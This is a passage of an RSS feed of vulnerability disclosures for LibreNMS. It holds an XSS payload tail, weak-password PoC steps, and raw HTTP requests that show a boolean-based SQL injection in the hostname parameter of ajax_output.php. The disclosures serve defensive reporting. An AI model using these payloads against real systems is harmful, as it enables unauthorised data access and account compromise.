&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC-XXS51&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-65013/image.png&amp;#34;
	width=&amp;#34;713&amp;#34;
	height=&amp;#34;589&amp;#34;
	srcset=&amp;#34;/p/cve-2025-65013/image_hu_d47d134d7563c0b1.png 480w, /p/cve-2025-65013/image_hu_790aaa5d86f85434.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;121&amp;#34;
		data-flex-basis=&amp;#34;290px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/librenms/librenms/security/advisories/GHSA-j8cq-7f6p-256x&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/librenms/librenms/security/advisories/GHSA-j8cq-7f6p-256x&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 18 Nov 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-65014</title>
        <link>https://www.cvehunters.com/p/cve-2025-65014/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-65014/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-65014-weak-password-policy-vulnerability-in-user-management-functionality&amp;#34;&amp;gt;CVE-2025-65014: Weak Password Policy Vulnerability in User Management Functionality
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-65014&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-65014&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Weak Password Policy vulnerability was identified in the user management functionality of the LibreNMS application. This vulnerability allows the creation of accounts with extremely weak and predictable passwords, such as &amp;lt;code&amp;gt;123456&amp;lt;/code&amp;gt;. This exposes the platform to brute-force and credential stuffing attacks.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to enforce a strong password policy when creating new users. As a result, administrators can define trivial and well-known weak passwords, compromising the authentication security of the system.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-65014-weak-password-policy-vulnerability-in-user-management-functionality&amp;#34;&amp;gt;CVE-2025-65014: Weak Password Policy Vulnerability in User Management Functionality
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-65014&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-65014&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Weak Password Policy vulnerability was identified in the user management functionality of the LibreNMS application. This vulnerability allows the creation of accounts with extremely weak and predictable passwords, such as &amp;lt;code&amp;gt;123456&amp;lt;/code&amp;gt;. This exposes the platform to brute-force and credential stuffing attacks.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to enforce a strong password policy when creating new users. As a result, administrators can define trivial and well-known weak passwords, compromising the authentication security of the system.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Vulnerable Component: &amp;lt;code&amp;gt;User creation / password definition&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Log in to the application using an &amp;lt;b&amp;gt;Administrator&amp;lt;/b&amp;gt; account.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Navigate to the user management section:&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Create a new user account using the password &amp;lt;code&amp;gt;12345678&amp;lt;/code&amp;gt;.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;The application accepts the weak password without restrictions and creates the account successfully.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-65014/image.png&amp;#34;
	width=&amp;#34;1103&amp;#34;
	height=&amp;#34;852&amp;#34;
	srcset=&amp;#34;/p/cve-2025-65014/image_hu_21856582e6cd0438.png 480w, /p/cve-2025-65014/image_hu_bd6251cd2138ff.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;129&amp;#34;
		data-flex-basis=&amp;#34;310px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-65014/image-1.png&amp;#34;
	width=&amp;#34;1359&amp;#34;
	height=&amp;#34;487&amp;#34;
	srcset=&amp;#34;/p/cve-2025-65014/image-1_hu_b22d3f1498de98f3.png 480w, /p/cve-2025-65014/image-1_hu_b4baf5a5f4a79968.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;279&amp;#34;
		data-flex-basis=&amp;#34;669px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Increased risk of brute-force and credential stuffing attacks.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to user or administrative accounts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Privilege escalation through compromised accounts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reduced overall security posture of the application.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/librenms/librenms/security/advisories/GHSA-5mrf-j8v6-f45g&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/librenms/librenms/security/advisories/GHSA-5mrf-j8v6-f45g&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 18 Nov 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-65093</title>
        <link>https://www.cvehunters.com/p/cve-2025-65093/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-65093/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-65093-sql-injection-boolean-based-vulnerability-in-hostname-parameter-on-ajax_outputphp-endpoint&amp;#34;&amp;gt;CVE-2025-65093: SQL Injection (Boolean-Based) Vulnerability in &amp;lt;code&amp;gt;hostname&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;ajax_output.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-65093&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-65093&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;hostname&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;ajax_output.php&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;hostname&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-65093-sql-injection-boolean-based-vulnerability-in-hostname-parameter-on-ajax_outputphp-endpoint&amp;#34;&amp;gt;CVE-2025-65093: SQL Injection (Boolean-Based) Vulnerability in &amp;lt;code&amp;gt;hostname&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;ajax_output.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-65093&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-65093&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;hostname&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;ajax_output.php&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;hostname&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;ajax_output.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Authenticate with an administrator account.&amp;lt;/b&amp;gt;&amp;lt;/br&amp;gt;
The discovery endpoint &amp;lt;code&amp;gt;/ajax_output.php&amp;lt;/code&amp;gt; is accessible only to users with admin-level privileges.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Access the following URL with the payload that evaluates to &amp;lt;code&amp;gt;TRUE:&amp;lt;/code&amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;9
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /ajax_output.php?id=capture&amp;amp;amp;format=text&amp;amp;amp;type=discovery&amp;amp;amp;hostname=10.0.5.4&amp;amp;#39;&#43;AND&#43;1=1&#43;AND&#43;&amp;amp;#39;1&amp;amp;#39;=&amp;amp;#39;1 HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: 10.0.5.5:8000
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: */*
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: http://10.0.5.5:8000/device/3/capture
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: laravel_session=[ADMIN_SESSION_COOKIE]
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Observe that the system returns the expected data and triggers the discovery process.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-65093/image.png&amp;#34;
	width=&amp;#34;1507&amp;#34;
	height=&amp;#34;666&amp;#34;
	srcset=&amp;#34;/p/cve-2025-65093/image_hu_be0427b4a619e324.png 480w, /p/cve-2025-65093/image_hu_7986fb62e6a5776b.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;226&amp;#34;
		data-flex-basis=&amp;#34;543px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Now repeat the request with a &amp;lt;code&amp;gt;FALSE&amp;lt;/code&amp;gt; condition:&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;9
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /ajax_output.php?id=capture&amp;amp;amp;format=text&amp;amp;amp;type=discovery&amp;amp;amp;hostname=10.0.5.4&amp;amp;#39;&#43;AND&#43;1=2&#43;AND&#43;&amp;amp;#39;1&amp;amp;#39;=&amp;amp;#39;1 HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: 10.0.5.5:8000
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: */*
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: http://10.0.5.5:8000/device/3/capture
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: laravel_session=[SESSION COOKIE]
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
